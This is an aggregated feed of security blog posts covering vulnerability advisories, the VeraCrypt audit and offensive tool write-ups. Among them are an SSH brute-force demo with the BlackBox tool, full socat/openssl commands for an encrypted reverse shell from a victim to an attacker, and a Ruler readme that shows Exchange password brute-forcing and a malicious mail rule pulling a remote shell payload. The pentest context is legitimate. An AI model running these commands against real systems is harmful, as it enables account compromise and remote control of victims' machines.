Se ven afectadas todas las versiones de OpenOffice 4.1.2 y anteriores, también afectan a OpenOffice.org. Estas vulnerabilidades están corregidas en OpenOffice 4.1.3. Se encuentra disponible para su descarga desde la página oficial.

Más información:

Windows Installer Can Enable Privileged Trojan Execution

Windows Installer Execution of Arbitrary Code with Elevated Privileges

  

Antonio Ropero
Twitter: @aropero

Via:unaaldia.hispasec.com

Resultados de la auditoría realizada a VeraCrypt

$
0
0
Mucho se especuló acerca de si Truecrypt tenía bugs intencionados o puertas traseras que permitieran a un oscuro tercero (aka NSA) acceder a cualquier contenedor cifrado. Para comprobarlo se llevó a cabo una campaña de crowdfunding para realizar una auditoría exhaustiva del popular software de código abierto y el resultado del proyecto llamado Open Crypto Alliance fueron algunos fallos no demasiados serios y, sobretodo, nada plausible en cuanto a malintencionado.

Por otro lado, ya sabéis que una vez discontinuado Truecrypt (2014) quizás la mejor o una de las mejores alternativas es el forkVeracrypt de IDRIX, desde el 28 de junio de 2015 bajo licencia Apache License 2.0.

Como no podía ser de otra manera y de forma similar a como se hizo con Truecrypt, la auditoría se hizo casi obligatoria para disipar cualquier suspicacia. Y para ello QuarksLab inició hace 2 meses una revisión de la versión 1.18 de Veracrypt y sus bootloaders que finalizó ayer con los siguientes resultados:

- 8 vulnerabilidades críticas
- 3 vulnerabilidades medias
- 15 vulnerabilidades bajas o informativas / preocupaciones

En el momento de la publicación de estas vulnerabilidades VeraCrypt ha lanzado la versión 1.19 que corrige la mayoría de ellas, y decimos la mayoría porque algunas todavía no he han corregido completamente debido a la complejidad de la implementación del parche correspondiente, si bien se presentan en la documentación los workarounds temporales correspondientes. Las correcciones son:

- Eliminación de la opción del cifrado GOST 28147-89: su implementación no es segura. Permanece la funcionalidad para descifrar volúmenes que usan este cifrado pero no se podrá volver a crear volúmenes nuevos con este cifrado.
- Eliminación de XZip y XUnzip: que han sido reemplazados por librerías zip más modernas y seguras (libzip).
- Corrección de la vulnerabilidad descrita en la sección 5.1 (la longitud de la password puede definirse en el bootloader clásico).
- Corrección de la vulnerabilidad descrita en la sección 7.1 en el nuevo bootloader. (keystrokes no son borrados después de la autenticación)
- Corrección de la vulnerabilidad descrita en la sección 7.2 en el nuevo bootloader. (los datos sensibles no son borrados correctamente)
- Corrección de la vulnerabilidad descrita en la sección 7.3 en el nuevo bootloader. (corrupción de memoria)
- Corrección de la vulnerabilidad descrita en la sección 7.4 en el nuevo bootloader. (null pointer, dead code, datos inconsistentes leídos por ConfigRead, puntero erróneo en EFIGetHandles, dereferencia de puntero nulo en la librería gráfica.)

El resultado es que VeraCrypt es mucho más seguro después de esta auditoría, así que os recomendamos actualizar a la versión 1.19 lo antes posible:https://sourceforge.net/projects/veracrypt/

Fuente: https://ostif.org/the-veracrypt-audit-results/

Via:www.hackplayers.com

BlackBox: Ataques para Joomla, WordPress, Magento o PrestaShop

$
0
0
Esta herramienta llamada BlackBox y escrita en Python permite a un pentester disponer de una suite interesante en su día a día en la oficina. BlackBox, que se encuentra en su versión 2.0 para desarrolladores, proporcionan distintas funcionalidades para los procesos de pentesting. Desde funcionalidades para hacer ataques de fuerza bruta, hasta recopilación de información, exploits, comandos para hacer algo dorking en tareas de hacking con buscadores e incluso cracking. Mucho potencial en la caja negra.

Figura 1: BlackBox. Ataques para CMSs Joomla, WordPress, Magento o PrestaShop

Para instalar BlackBox sobre nuestra máquina podemos descargarlo desde su Github. Después, simplemente, hay que ejecutar el script install. Como se puede ver en la imagen tenemos elementos orientados a auditorias web, en su mayor parte.

Figura 2: BlackBox en GitHub

Disponemos también de una serie de funcionalidades orientadas a realizar ataques de fuerza bruta en entornos web, además de para localizar la página de login en cada sitio, con las opciones de:
• Wordpress Bruteforce
• FTP Bruteforce
• SSH Bruteforce

• Admin Page Finder
Figura 3: Funciones disponibles en BlackBox

La categoría de exploits orientados a entornos web tenemos algunos para diferentes frameworks, como Joomla!, Magento o PrestaShop:
• Joomla RCE (Remote Code Execution)
• Magento RCE (Remote Code Execution)
• PrestaShop Exploit
Aunque no tengamos gran cantidad de exploits, pueden ser útiles en algunos escenarios. Además, para complementar entornos como exploit-db, tenemos la categoría de dorking dónde podemos encontrar:
• Google Dorker
• Bing Dorker
• Scan list
Por último, tenemos la posibilidad de utilizar una herramienta para crackear hashes en formato MD5, SHA1, etcétera, generalmente algoritmos utilizados en muchos de estos frameworks para aplicaciones web. Vamos a probarlo un poco.

PoC: Carga y configuración del módulo de fuerza bruta SSH

En esta prueba de concepto vamos a configurar el módulo de fuerza bruta de SSH con BlackBox, para replicar cómo podría funcionar el proceso de capturar dispositivos para una botnet mediante un proceso tan sencillo como crackear por diccionario un servicio SSH mal fortificado. Si ejecutamos la opción blackbox ssh_brute -h podemos ver las diferentes opciones del módulo. Esto sirve para todos los módulos que tenemos disponible en BlackBox.

Para configurar el módulo hay que indicar la dirección IP dónde se lanzará la fuerza bruta a SSH, el usuario de SSH que se quiere atacar y la ruta del fichero de contraseñas. Existen muchas herramientas que permiten realizar este tipo de acciones, pero BlackBox permite tener estas funcionalidades centralizadas por módulos. Esto es interesante, ya que es fácilmente escalable en número de módulos, es decir, en otras funcionalidades.

Figura 4: Prueba de diccionario contra servidor SSH

Si ejecutamos la opción blackbox google_dorker -h podemos ver las opciones para la búsqueda en Google. El ejemplo que el propio BlackBox propone es blackbox google_dorker –dork=”php?id” –level 10. Es interesante ir probando esto, también probando sobre Bing. Esto permite automatizar el descubrimiento de determinados objetivos y generar scripts automatizados para probar exploits, por ejemplo, de los que acompañan a la herramienta.

El módulo hash_killer permite generar hashes en el algoritmo que se quiere y realizar la comparación los hashes que se encuentran en dicho algoritmo. Por ejemplo, tenemos la opción -w dónde situamos las palabras de diccionario que queremos hashear y comparar con los hashes que se encuentran en el fichero asociado al parámetro –md5, por ejemplo.

Figura 5: Opciones para Hash_Killer
Como se puede ver, la herramienta tiene opciones especiales para crackear los hashes de los motores de bases de datos más populares en los CMS para los que incorpora exploits.

Reflexión final

Este proyecto es una caja de herramientas sencilla, que debemos llevar encima por si acaso nos es útil. Si miras el proyecto en su estructura, tal vez su creador no lo tiene tan enfocado al mundo del pentesting como al mundo de exploiting masivo en Internet automatizado - a la vista de las opciones de dorking y los objetivos tan populares en la red -, pero para nosotros lo más interesante es que el proyecto se encuentra bastante activo y se van añadiendo diferentes módulos con cada nueva versión, por lo que os proponemos que estéis atentos a las diferentes opciones y posibilidades que BlackBox ofrece con cada release.

Figura 6: Actualizaciones en cada versión

Por el otro lado, vistas la existencia de muchas herramientas automatizadas como estas, no me queda más que recomendar la actualización constante del software de las plataformas CMS, además de que hagas un esfuerzo por proteger WordPress contra ataques de fuerza bruta - y si lo ponéis en Paranoid Mode mejor -, y que pongáis un Latch en vuestros servicios SSH, en vuestros servidores e-commerce con Magento o en vuestra tienda con Prestashop... por si las moscas, que ahí suele haber datos de clientes y no te gustaría que aparecieran en la Dark Web.

Autor: Pablo González Pérez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y “Pentesting con Powershell

Via:www.elladodelmal.com

VBScan 0.1.7 - Black Box vBulletin Vulnerability Scanner

$
0
0

OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analyses them .

Why OWASP VBScan ?
If you want to do a penetration test on a vBulletin Forum, OWASP VBScan is Your best shot ever! This Project is being faster than ever and updated with the latest VBulletin vulnerabilities.

usage :
./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin

OWASP VBScan 0.1.7 introduction (Youtube)


What’s New in Version 0.1.7 [Dennis Ritchie]
OWASP VBScan 0.1.7 [Larry Wall]
  • Updated exploit database
  • Compatible With Windows [Linux,OSX,Windows]
  • Added Full Path Disclosure (FPD) module
  • Added firewall detect/bypass module
  • Optimized version checker module engine [#12 issue]
  • Upgrade config finder module
  • Random user agent module set as default setting
  • Added HTML Report



Via:www.kitploit.com

Elevación de privilegios en VMware vRealize Operations

$
0
0
VMware ha publicadouna actualización de seguridad para corregir una vulnerabilidad en VMware vRealize vRealize Operations(vROps), que podría permitir a un atacante local elevar sus privilegios en los sistemas afectados.

VMware vRealize Operations implementa una gestión centralizada de las operaciones de TI, abarcando desde las aplicaciones a la infraestructura, en entornos físicos, virtuales y de cloud.

El problema, con CVE-2016-7457, está considerado crítico pero VMware no ha facilitado información detallada sobre la causa de la vulnerabilidad. Aunque confirma que un usuario de vROps con privilegios limitados podría conseguir acceso total sobre la aplicación. Además podría detener y eliminar máquinas virtuales administradas por vCenter. Afecta a vRealize Operations 6.3.0, 6.2.1, 6.2.0a y 6.1.0.

VMware ha publicado parches como contramedida disponibles desde
vRealize Operations 6.3.0
vRealize Operations 6.2.1
vRealize Operations 6.2.0a
vRealize Operations 6.1.0

Más información:

VMSA-2016-0016
vRealize Operations (vROps) updates address privilege escalation vulnerability

  

Antonio Ropero

Twitter: @aropero

Via:unaaldia.hispasec.com

Shell inversa interactiva y cifrada con socat y openssl

$
0
0
Tras leer el artículo de alguien en la fisi (http://blog.alguien.site/2016/05/shell-reversa-interactiva-lo-hackback.html), me puse a investigar como mejorar la técnica de creación de una shell inversa de forma interactiva y además por un canal seguro.
Hoy me gustaría compartir con vosotros como crear una shell inversa de forma interactiva con socat y como cifrar ese canal a través de openssl.

Dicho esto vamos al lío :-)

Lo primero tenemos dos terminales, una de la victima y la otra del atacante.

Ya se que lo sabréis la mayoría, pero por si acaso antes de nada os comento la diferencia entre shell directa y shell inversa:

-Shell directa: El atacante se conecta directamente a la victima.
-Shell inversa: En este otro caso sería la victima la que se conectaría al atacante (usada habitualmente para evadir sistemas de firewall)


ATACANTE

Lo primero de todo sería generar un certificado con openssl y dejar un puerto a la escucha mediante socat en la máquina atacante.

openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.pem && \
    socat `tty`,raw,echo=0 openssl-listen:1237,reuseaddr,cert=cert.pem,verify=0

VICTIMA

Ahora ejecutaríamos lo siguiente en la máquina victima:

ps -ef | grep -q '[o]penssl-connect' || \
    socat openssl-connect::1237,verify=0 exec:bash,pty,stderr,setsid

El tema es que nos casca la conexión con el siguiente error:

socat[3287] E SSL_connect(): error:14082174:SSL routines:SSL3_CHECK_CERT_AND_ALGORITHM:dh key too small

Este error es debido al Logjam Attack (https://weakdh.org/) y podríamos evitarlo repitiendo el proceso anterior con ejecuciones separadas de openssl y socat y entre medias de ambas ejecutar los siguientes comandos:

openssl dhparam -out dhparams.pem 2048
cat dhparams.pem >> cert.pem


Repetimos por tanto el proceso anterior:

ATACANTE

Lo primero sería generar un certificado con openssl y dejar un puerto a la escucha mediante socat en la máquina atacante ya que estamos hablando de una reverse shell.

openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.pem

openssl dhparam -out dhparams.pem 2048
cat dhparams.pem >> cert.pem


socat `tty`,raw,echo=0 openssl-listen:1237,reuseaddr,cert=cert.pem,verify=0


Ahora sí hemos generado el certificado y dejado un puerto a la escucha en la máquina atacante.


VICTIMA

Ahora ejecutaríamos lo siguiente en la máquina victima para conectar al puerto que está escuchando en la máquina atacante.

ps -ef | grep -q '[o]penssl-connect' || \
    socat openssl-connect::1237,verify=0 exec:bash,pty,stderr,setsid


A partir de ahora tendríamos una shell inversa y cifrada contra el equipo victima, y podemos ver que sería totalmente interactiva puesto que nos funcionarían programas del tipo top, vim, ssh, su, sudo o cualquier programa que solicite cualquier acción de forma interactiva para el usuario ya sea solicitando una password como es el caso de ssh, su y sudo o de otra manera como top y vim.

Más info.

https://nerdvana.org/posts/reverse-shell-via-socat
https://youremindmeofmymother.com/2015/08/21/socat-ssl-ssl-routinesssl3_check_cert_and_algorithmdh-key-too-small/
http://blog.stalkr.net/2015/12/from-remote-shell-to-remote-terminal.html
Via:www.hackplayers.com

Ruler - A Tool To Abuse Exchange Services

$
0
0

Ruler is a tool that allows you to interact with Exchange servers through the MAPI/HTTP protocol. The main aim is abuse the client-side Outlook mail rules as described in: Silentbreak blog

Silentbreak did a great job with this attack and it has served us well. The only downside has been that it takes time to get setup. Cloning a mailbox into a new instance of Outlook can be time consuming. And then there is all the clicking it takes to get a mailrule created. Wouldn't the command line version of this attack be great? And that is how Ruler was born.

The full low-down on how Ruler was implemented and some background regarding MAPI can be found in this blog post: SensePost blog

For a demo of it in action: Ruler on YouTube

What does it do?
Ruler has multiple functions and more are planned. These include
  • Enumerate valid users
  • View currently configured mail rules
  • Create new malicious mail rules
  • Delete mail rules
Ruler attempts to be semi-smart when it comes to interacting with Exchange and uses the Autodiscover service (just as your Outlook client would) to discover the relevant information.

Getting the Code
Ruler is written in Go so you'll need to have Go setup to run/build the project The first step as always is to clone the repo :
git clone https://github.com/sensepost/ruler.git
Or you can get it through Go:
go get github.com/sensepost/ruler
You can now run the app through go run if you wish:
go run ruler.go -h
Or build it (the prefered option):
go build

Interacting with Exchange
It is important to note that for now this only works with the newer MAPI/HTTP used for OutlookAnywhere. The older RPC/HTTP which MAPI replaces is not supported and may possibly not be supported.
As mentioned before there are multiple functions to Ruler. In most cases you'll want to first find a set of valid credentials. Do this however you wish, Phishing, Wifi+Mana or brute-force.

Brute-force for credentials
If you go the brute-force route, Ruler is your friend. It has a built-in brute-forcer which does a semi-decent job of finding creds.
./ruler -domain targetdomain.com -brute -usernames /path/to/user.txt -passwords /path/to/passwords.txt
You should see your brute-force in action:
./ruler -domain evilcorp.ninja -brute -usernames ~/users.txt -passwords ~/passwords.txt -delay 0 -v -insecure

[*] Starting bruteforce
[x] Failed: cindy.baker:P@ssw0rd
[x] Failed: henry.hammond:P@ssw0rd
[x] Failed: john.ford:P@ssw0rd
[x] Failed: cindy.baker:August2016
[x] Failed: henry.hammond:August2016
[+] Success: john.ford:August2016
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: cindy.baker:Evilcorp@2016
[x] Failed: henry.hammond:Evilcorp@2016
[x] Failed: cindy.baker:3V1lc0rp
[x] Failed: henry.hammond:3V1lc0rp
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: henry.hammond:Password1
[+] Success: cindy.baker:Password1
[x] Failed: henry.hammond:Password!2016
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: henry.hammond:SensePost1
[x] Failed: henry.hammond:Lekker
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: henry.hammond:Eish
There are a few other flags that work with -brute These are:
  • -stop //stop on the first valid username:password combo
  • -delay //how long to wait between multiple password guesses
  • -attempts //how many attempts before we delay (attempts per user)
  • -insecure //if the Exchange server has a bad SSL cerificate
  • -v //be verbose and show failed attempts

The autodiscover service
While Ruler makes a best effort to "autodiscover" the necessary settings, you may still run into instances of it failing. The common causes are:
  • autodiscover deployed over http and not https (we default to https as this is more common)
  • No autodiscover DNS record
  • Authentication failing
If you encounter an Exchange server where the Autodiscover service is failing, you can manually specify the Autodiscover URL:
./ruler -url http://autodiscover.somedomain.com/autodiscover/autodiscover.xml
If you run into issues with Authentication (and you know the creds are correct), you can try and force the use of basic authentication with -basic

Display existing rules / verify account
Once you have a set of credentials you can target the user's mailbox. Here you'll need to know their email address (address book searching is in the planned extension).
./ruler -domain targetdomain.com -email user@targetdomain.com -user username -pass password -display
Output:
./ruler -domain evilcorp.ninja -user john.ford -pass August2016 -email john.ford@evilcorp.ninja -display -insecure

[*] Retrieving MAPI info
[*] Doing Autodiscover for domain
[+] MAPI URL found: https://mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja
[+] User DN: /o=Evilcorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford
[*] Got Context, Doing ROPLogin
[*] And we are authenticated
[+] Mailbox GUID: [251 102 208 159 53 202 228 77 184 67 76 15 228 47 61 223]
[*] Openning the Inbox
[+] Retrieving Rules
[+] Found 0 rules

Delete existing rules (clean up after yourself)
To delete rules, use the ruleId displayed next to the rule name (000000df1)
./ruler -domain targetdomain.com -email user@targetdomain.com -user username -pass password -delete 000000df1

Popping a shell
Now the fun part. Your initial setup is the same as outlined in the Silentbreak blog , setup your webdav server to host your payload.
To create the new rule user Ruler and:
./ruler -domain targetdomain.com -email user@targetdomain.com -user username -pass password -loc "\\\\yourserver\\webdav\\shell.bat" -trigger "pop a shell" -rule maliciousrule
The various parts:
  • -loc this is the location of your remote shell note the double slashes (or c:/Windows/system32/calc.exe)
  • -trigger the string within the subject you want to trigger the rule
  • -rule a name for your rule
Output:
[*] Retrieving MAPI info
[*] Doing Autodiscover for domain
[+] MAPI URL found: https://mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja
[+] User DN: /o=Evilcorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford
[*] Got Context, Doing ROPLogin
[*] And we are authenticated
[+] Mailbox GUID: [251 102 208 159 53 202 228 77 184 67 76 15 228 47 61 223]
[*] Openning the Inbox
[*] Adding Rule
[*] Rule Added. Fetching list of rules...
[+] Found 1 rules
Rule: shell RuleID: 01000000127380b1
You should now be able to send an email to your target with the trigger string in the subject line. From testing the mailrule is synchronised across nearly instantaniously, so in most cases you should be able to get a shell almost immediatly, assuming outlook is open and connected.
Enjoy your shell and don't forget to clean-up after yourself by deleting the rule (or leave it for persistence).



Via:www.kitploit.com

Oracle corrige 253 vulnerabilidades en su actualización de seguridad de octubre

$
0
0
Siguiendo su ritmo de publicación trimestral de actualizaciones, Oracle publica su boletín de seguridad de octubre. Contiene parches para 253 nuevas vulnerabilidades diferentes en múltiples productos pertenecientes a diferentes familias, que van desde el popular gestor de base de datos Oracle Database hasta Solaris, Java o MySQL.

Los fallos se dan en varios componentes de múltiples productos y como es habitual la lista de productos afectados es extensa:
  • Application Express, versiones anteriores a la 5.0.4.0.7
  • Oracle Database Server, versiones 11.2.0.4 y 12.1.0.2
  • Oracle Secure Backup, versiones anteriores a la 10.4.0.4.0 y anteriores a la 12.1.0.2.0
  • Big Data Graph, versiones anteriores a la 1.2
  • NetBeans, versión 8.1
  • Oracle BI Publisher, versiones 11.1.1.7.0, 11.1.1.9.0 y 12.2.1.0.0
  • Oracle Big Data Discovery, versiones 1.1.1, 1.1.3 y 1.2.0
  • Oracle Business Intelligence Enterprise Edition, versiones 11.1.1.7.0, 11.1.1.9.0, 12.1.1.0.0 y 12.2.1.1.0
  • Oracle Data Integrator, versiones 11.1.1.7.0, 11.1.1.9.0, 12.1.2.0.0, 12.1.3.0.0, 12.2.1.0.0 y 12.2.1.1.0
  • Oracle Discoverer, versiones 11.1.1.7.0
  • Oracle Fusion Middleware, versiones 11.1.1.7, 11.1.1.9, 11.1.2.3, 11.1.2.4, 12.1.3.0, 12.2.1.0 y 12.2.1.1
  • Oracle GlassFish Server, versiones 2.1.1, 3.0.1 y 3.1.2
  • Oracle Identity Manager
  • Oracle iPlanet Web Proxy Server, version 4.0
  • Oracle iPlanet Web Server, version 7.0
  • Oracle Outside In Technology, versiones 8.4.0, 8.5.1, 8.5.2 y 8.5.3
  • Oracle Platform Security for Java, versiones 12.1.3.0.0, 12.2.1.0.0 y 12.2.1.1.0
  • Oracle Web Services, versiones 11.1.1.7.0, 11.1.1.9.0, 12.1.3.0.0 y 12.2.1.0.0
  • Oracle WebCenter Sites, versiones 12.2.1.0.0, 12.2.1.1.0 y 12.2.1.2.0
  • Oracle WebLogic Server, versiones 10.3.6.0, 12.1.3.0, 12.2.1.0 y 12.2.1.1
  • Enterprise Manager, versiones 12.1.4, 12.2.2 y 12.3.2
  • Enterprise Manager Base Platform, version 12.1.0.5
  • Oracle Application Testing Suite, versiones 12.5.0.1, 12.5.0.2 y 12.5.0.3
  • Oracle E-Business Suite, versiones 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 y 12.2.6
  • Oracle Advanced Supply Chain Planning, versiones 12.2.3, 12.2.4 y 12.2.5
  • Oracle Agile Engineering Data Management, versiones 6.1.3.0 y 6.2.0.0
  • Oracle Agile PLM, versiones 9.3.4 y 9.3.5
  • Oracle Agile Product Lifecycle Management for Process, versiones 6.1.0.4, 6.1.1.6 y 6.2.0.0
  • Oracle Transportation Management, versiones 6.1, 6.2, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.3.5, 6.3.6 y 6.3.7
  • PeopleSoft Enterprise HCM, versión 9.2
  • PeopleSoft Enterprise PeopleTools, versiones 8.54 y 8.55
  • PeopleSoft Enterprise SCM Services Procurement, versiones 9.1 y 9.2
  • JD Edwards EnterpriseOne Tools, versión 9.1
  • JD Edwards World Security, versión A9.4
  • Siebel Applications, versiones 7.1 y 16.1
  • Oracle Commerce Guided Search, versiones 6.2.2, 6.3.0, 6.4.1.2, 6.5.0, 6.5.1 y 6.5.2
  • Oracle Commerce Guided Search / Oracle Commerce Experience Manager, versiones 3.1.1, 3.1.2, 6.2.2, 6.3.0, 6.4.1.2, 6.5.0, 6.5.1, 6.5.2, 6.5.3, 11.0, 11.1 y 11.2
  • Oracle Commerce Platform, versiones 10.0.3.5, 10.2.0.5 y 11.2.0.1
  • Oracle Commerce Service Center, versiones 10.0.3.5 y 10.2.0.5
  • Oracle Fusion Applications, versiones 11.1.2 hasta 11.1.9
  • Oracle Communications Policy Management, versiones 9.7.3, 9.9.1, 10.4.1, 12.1.1 y anteriores
  • Oracle Enterprise Communications Broker, versiones Pcz2.0.0m4p5 y anteriores
  • Oracle Enterprise Session Border Controller, versiones Ecz7.3m2p2 y anteriores
  • Oracle Banking Digital Experience, versión 15.1
  • Oracle Financial Services Analytical Applications Infrastructure, versiones 7.3.0, 7.3.1, 7.3.2, 7.3.3, 7.3.4, 7.3.5, 8.0.0, 8.0.1, 8.0.2 y 8.0.3
  • Oracle Financial Services Lending and Leasing, versiones 14.1.0 y 14.2.0
  • Oracle FLEXCUBE Core Banking, versiones 11.5.0.0.0 y 11.6.0.0.0
  • Oracle FLEXCUBE Enterprise Limits and Collateral Management, versiones 12.0.0 y 12.1.0
  • Oracle FLEXCUBE Investor Servicing, version 12.0.1
  • Oracle FLEXCUBE Private Banking, versiones 2.0.0, 2.0.1, 2.2.0, 12.0.0, 12.0.1, 12.0.2, 12.0.3 y 12.1.0
  • Oracle FLEXCUBE Universal Banking, versiones 11.3.0, 11.4.0, 12.0.1, 12.0.2, 12.0.3, 12.1.0, 12.2.0, 12.87.1 y 12.87.2
  • Oracle Life Sciences Data Hub, versiones 2.x
  • Oracle Hospitality OPERA 5 Property Services, versiones 5.4.0.0, 5.4.1.0, 5.4.2.0, 5.4.3.0, 5.5.0.0 y 5.5.1.0
  • Oracle Insurance IStream, versión 4.3.2
  • MICROS XBR, versiones 7.0.2 y 7.0.4
  • Oracle Retail Back Office, versiones 13.0, 13.1, 13.2, 13.3, 13.4, 14.0 y 14.1
  • Oracle Retail Central Office, versiones 13.0, 13.1, 13.2, 13.3, 13.4, 14.0 y 14.1
  • Oracle Retail Clearance Optimization Engine, versiones 13.2, 13.3, 13.4 y 14.0
  • Oracle Retail Customer Insights, versión 15.0
  • Oracle Retail Merchandising Insights, versión 15.0
  • Oracle Retail Returns Management, versiones 13.0, 13.1, 13.2, 13.3, 13.4, 14.0 y 14.1
  • Oracle Retail Xstore Payment, versión 1.x
  • Oracle Retail Xstore Point of Service, versiones 5.0, 5.5, 6.0, 6.5, 7.0 y 7.1
  • Primavera P6 Enterprise Project Portfolio Management, versiones 8.4, 15.x y 16.x
  • Primavera P6 Professional Project Management, versiones 8.3, 8.4, 15.x y 16.x
  • Oracle Java SE, versiones 6u121, 7u111 y 8u102
  • Oracle Java SE Embedded, versión 8u101
  • Solaris, versiones 10 y 11.3
  • Solaris Cluster, versiones 3.3 y 4.3
  • Sun ZFS Storage Appliance Kit (AK), versión AK 2013
  • Oracle VM VirtualBox, versiones anteriores a la 5.0.28, anteriores a la 5.1.8
  • Secure Global Desktop, versiones 4.7 y 5.2
  • Sun Ray Operating Software, versiones anteriores a la 11.1.7
  • Virtual Desktop Infrastructure, versiones anteriores a la 3.5.3
  • MySQL Connector, versiones 2.0.4 y anteriores y 2.1.3 y anteriores
  • MySQL Server, versiones 5.5.52 y anteriores, 5.6.33 y anteriores y 5.7.15 y anteriores


A continuación ofrecemos una relación de productos y el número de vulnerabilidades corregidas: 
  • Nueve nuevas vulnerabilidades corregidas en Oracle Database Server (una de ellas explotable remotamente sin autenticación), 2 vulnerabilidades en Oracle Secure Backup (ambas explotables remotamente sin autenticación) y una nueva vulnerabilidad corregida en Oracle Big Data Graph. Afectan a los componentes: OJVM, Kernel PDB, Application Express, RDBMS Programmable Interface, RDBMS Security y RDBMS Security and SQL*Plus.
          
  • Otras 29 vulnerabilidades afectan a Oracle Fusion Middleware. 19 de ellas podrían ser explotadas por un atacante remoto sin autenticar. Los componentes afectados son: BI Publisher (formerly XML Publisher), NetBeans, Oracle Big Data Discovery, Oracle Business Intelligence Enterprise Edition, Oracle Data Integrator, Oracle Discoverer, Oracle GlassFish Server, Oracle Identity Manager, Oracle iPlanet Web Proxy Server, Oracle iPlanet Web Server, Oracle Outside In Technology, Oracle Platform Security for Java, Oracle Web Services y Oracle WebCenter Sites.     
       
  • Esta actualización contiene cinco nuevas actualizaciones de seguridad para Oracle Enterprise Manager Grid Control, cuatro de ellas explotables remotamente sin autenticación. Afectan a Enterprise Manager, Oracle Application Testing Suite y Enterprise Manager Base Platform.   
         
  • Dentro de Oracle Applications, 21 parches son para Oracle E-Business Suite, 19 parches son para la suite de productos Oracle Supply Chain, 11 para productos Oracle PeopleSoft, dos para productos Oracle JD Edwards, tres para Oracle Siebel CRM y siete para Oracle Commerce.
        
     
  • Se incluyen también 36 nuevos parches para Oracle Communications Applications, 31 de ellos tratan vulnerabilidades explotables remotamente sin autenticación. De forma similar tan solo una nueva corrección para Oracle Health Sciences Applications (aunque podría ser explotable remotamente sin autenticación). También incluye un nuevo parche para Oracle Insurance Applications y tres para Oracle Hospitality Applications.
        
     
  • Esta actualización contiene 10 nuevas actualizaciones de seguridad para Oracle Retail Applications, 10 de ellas explotables remotamente sin autenticación.
         
  • También se incluyen dos nuevos parches de seguridad para software Oracle Primavera Products Suite, una de ellas podría explotarse de forma remota sin autenticación.
         
  • En lo referente a Oracle Java SEse incluyen 7 nuevos parches de seguridad, todos referentes a vulnerabilidades que podrían ser explotadas por un atacante remoto sin autenticar.
         
  • Para la suite de productos Oracle Sun Systems se incluyen 16 nuevas actualizaciones, 10 de ellas afectan directamente a Solaris.
        
     
  • 31 nuevas vulnerabilidades afectan a MySQL Server (dos de ellas podrían ser explotada por un atacante remoto sin autenticar).
         
  • Esta actualización también contiene 13 parches para Oracle Virtualización.


Para comprobar las matrices de productos afectados, gravedad y la disponibilidad de parches, es necesario comprobar la notificación oficial en:
Oracle Critical Patch Update Advisory – October 2016

Más información:

Oracle Critical Patch Update Advisory - October 2016



Antonio Ropero

Twitter: @aropero

Via:unaaldia.hispasec.com

XI Concurso Universitario de Software Libre

$
0
0
El pasado día 15 de Octubre se abrió el plazo de inscripción para la undécima edición del Concurso Universitario de Software Libre, correspondiente con el curso académico 2016/17. En el concurso pueden inscribirse estudiantes de bachillerato, ciclos de grado medio y superior; y universitarios (incluido grado, máster y doctorado) matriculados en centros españoles durante este curso. Las inscripciones podrán realizarse a través de la web http://www.concursosoftwarelibre.org/1617/.

Con esta nueva edición que comienza a andar acumulan ya once ediciones del concurso. Allá por 2006, empezaron a trabajar con mucha ilusión y muy pocos recursos con el objetivo de acercar el desarrollo de software libre a los estudiantes.

Ahora se cumplen once años desde que comenzó esta actividad de promoción del desarrollo de software libre en el ámbito educativo y universitario. Y así, siguen acumulando “números interesantes”: la cifra de estudiantes participantes asciende ya a casi 1300, los cuales han presentado más de 890 proyectos. También son cerca de 50.000 los euros repartidos en premios desde la creación del concurso.

Fase final del X Concurso Universitario de Software Libre en Mayo de 2016, Sevilla.
Este XI CUSL cuenta de momento con el apoyo organizativo de las oficinas del software libre de las universidades de Sevilla, La Laguna, Miguel Hernández (Elche), Zaragoza, Córdoba y Almería.

Desde la organización del concurso creen que el Software Libre se presenta como un complemento perfecto para la formación de los estudiantes, ya que les permite obtener experiencia en el proceso de desarrollo de software o hardware en etapas previas a la inserción en la vida laboral. Es por eso por lo que animan a los estudiantes a que participen en dicho evento.

Recordar también que aún se encuentra abierto el plazo de búsqueda de patrocinadores para el concurso. La información al respecto se puede encontrar en la dirección http://www.concursosoftwarelibre.org/1617/patrocinadores.

Via:www.hackplayers.com

WP Security Audit Log - The Ultimate WordPress Audit Trail Plugin

$
0
0
The WP Security Audit Log plugin is a WordPress plugin that keeps an audit trail of everything that happens on your WordPress and WordPress multisite network. There are several WordPress audit trail / log plugins available, tough we chose to review WP Security Audit Log because it is has the most comprehensive logging and the best coverage of WordPress changes. It is also the most complete and mature WordPress audit trail solution.

Why Do You Need a WordPress Audit Trail?

First things first, why would you need a WordPress audit trail? A WordPress audit trail is a record, or better a log of every change that happened on your WordPress, similar to Syslog on Linux/Unix or the Events Viewer on Microsoft Windows. The WordPress audit trail can be used to:
  • Keep track of users’ productivity (ideal for multi-users setups),
  • Ease the troubleshooting in case something is wrong with the WordPress website,
  • Identify any possible malicious WordPress hack attacks before they actually happen,
  • Catch hackers red handed if they manage to hack into your WordPress,
  • Do all the forensics to track back which security hole the hackers exploited so you can close it down.

